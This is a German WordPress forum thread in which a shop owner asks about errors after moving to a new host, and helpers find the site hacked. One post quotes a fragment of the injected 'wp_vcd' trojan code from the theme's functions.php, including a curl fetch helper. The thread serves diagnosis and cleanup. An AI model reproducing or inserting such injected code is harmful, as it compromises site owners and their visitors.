1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Umzug zu neuem Anbieter/Hoster - Fehler

Dieses Thema im Forum "Installation" wurde erstellt von Kiwikick-admin, 27. August 2018.

Schlagworte:
  1. Kiwikick-admin

    Registriert seit:
    27. August 2018
    Beiträge:
    12
    Zustimmungen:
    0
    Hallo zusammen,

    ich bin am Wochenende zu einem neuen Hoster gewechselt und habe meine Seite (Wordpress-Online-Shop mit Woocommerce) hochgeladen, die Datenbank importiert - alles fehlerfrei.

    Nun öffne ich die Seite und das Startthema zeigt direkt Fehler an - unter anderem ca. 8 mal in verschiedenen Funktionen: "Deprecated: Function create_function() is deprecated in [...]"
    Danach als letzten Fehler diesen hier "Warning: Use of undefined constant REQUEST_URI - assumed 'REQUEST_URI' (this will throw an Error in a future version of PHP) in /var/www/vhosts/shop-kiwikick.de/httpdocs/wp-content/themes/Electro/functions.php on line 73".

    "Wenn ich die php-Version des Servers umstelle, dann werden es weniger Fehler, aber im Thema werden nachwievor nur Fehler angezeigt und kein Seitenname oder Informationen etc. - also fehlerhafte Startseite ohne Logo etc.

    Die .htaccess habe ich bereits gelöscht/umbenannt, damit diese neu geschrieben werden kann.

    Woran kann das liegen? Unterseiten etc. funktionieren alle nicht und werden nicht gefunden.
     
  2. SirEctor

    SirEctor Well-Known Member
    Ehrenmitglied

    Registriert seit:
    28. Oktober 2008
    Beiträge:
    12.341
    Zustimmungen:
    419
    Wie hast du die Seite umgezogen? Hast du auch sämtliche Einträge in der Datenbank von 127.0.0.1 auf shop-kiwikick.de geändert?

    Hast du die Lizenz von RevSlider angepasst?
     
  3. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    9.031
    Zustimmungen:
    1.077
    Manche Hacks haben solche Effekte, wenn sie auf "zu hohe" PHP Versionen treffen.

    Poste mal die Zeilen 65-80 aus der genannten Datei functions.php

    Ergänzung: Der Website ist mit sehr hoher Wahrscheinlichkeit gehackt, ein Kurztest via sitecheck.sucuri.net ergibt das Einfügen von schädlichen Scripts, wahrscheinlich 1 x pro IP / Besucher innerhalb eines Zeitraumes.

    HTML:
    Entschuldige, aber du musst dich registrieren oder anmelden um den Inhalt sehen zu können!
     
    #3 b3317133, 27. August 2018
    Zuletzt bearbeitet: 27. August 2018
  4. Kiwikick-admin

    Registriert seit:
    27. August 2018
    Beiträge:
    12
    Zustimmungen:
    0
    Hi. danke für die schnelle Rückmeldung - also ich habe die Seite hochgeladen (inklusive aller Ordner), danach die Datenbank importiert und innerhalb der Datenbank dann die alte Domain in die neue geändert. Zuzüglich noch in der config die neuen Daten eingegeben.
     
  5. Kiwikick-admin

    Registriert seit:
    27. August 2018
    Beiträge:
    12
    Zustimmungen:
    0
    Malware found? ok, ich schaue mir das nachher mal an. Danke für den Tipp
     
  6. Kiwikick-admin

    Registriert seit:
    27. August 2018
    Beiträge:
    12
    Zustimmungen:
    0
    Also ich habe die Seite noch einmal neu hochgeladen - den Support kontaktiert zwecks Malware - leider noch keine Antwort erhalten.

    Dennoch haben sich die Fehler minimiert - auf 1 Zeile.... und wie gehabt: Zeile 73 im Theme.

    Ich habe über phpadmin alle Daten zur neuen Domain angepasst, ebenfalls in der wp-config...

    woran kann es noch liegen? Anscheinend kann das Thema die URL nicht zurückerhalten - wenn ich nämlich Unterseiten öffne, so werden diese nicht gefunden.
     
  7. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    9.031
    Zustimmungen:
    1.077
    Poste mal die Zeilen 65-80 aus der genannten Datei functions.php
     
  8. Kiwikick-admin

    Registriert seit:
    27. August 2018
    Beiträge:
    12
    Zustimmungen:
    0
    das sind die betreffenden Zeilen... Zeile 73 ist die hier:

    "$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];"


    $div_code_name = "wp_vcd";
    $funcfile = __FILE__;
    if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

    function file_get_contents_tcurl($url)
    {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
    }
     
  9. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    9.031
    Zustimmungen:
    1.077
    Wie vermutet ist der Website gehackt. Der o.g. Codeauszug ist Teil eines Trojaners, mehr dazu siehe hier.

    Komplettbackup im gehackten Zustand erstellen, damit man später nachvollziehen kann, wo die Lücke war. Das weitere Vorgehen ist z.B. hier beschrieben.

    Alternativ professionelle Hilfe z.B. über die Jobbörse hier im Forum suchen.
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden